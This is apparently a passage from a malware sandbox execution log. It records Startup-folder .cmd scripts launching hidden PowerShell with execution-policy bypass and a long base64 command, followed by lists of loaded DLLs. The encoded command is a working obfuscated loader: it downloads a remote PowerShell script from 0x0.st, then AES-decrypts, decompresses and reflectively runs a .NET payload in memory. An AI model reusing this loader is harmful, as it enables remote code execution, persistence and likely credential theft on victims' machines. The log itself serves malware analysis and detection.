Uk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
